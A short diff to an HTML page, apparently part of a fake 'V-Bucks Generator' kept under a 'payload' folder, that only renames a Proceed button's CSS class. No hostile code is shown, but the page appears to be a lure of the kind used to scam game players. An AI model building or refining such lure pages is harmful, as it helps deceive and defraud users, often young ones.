--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -52,7 +52,7 @@
                       <p><span id="user-text"></span> has been linked to the V-Bucks Generator.
                       
                         <div class="col-lg-12" style="margin-top: 20px;">
-                          <a onclick="proceed()" href="index.html#" class="generate">Proceed</a>
+                          <a onclick="proceed()" href="index.html#" class="proceed">Proceed</a>
                        </div>                      
                       
                       </p>
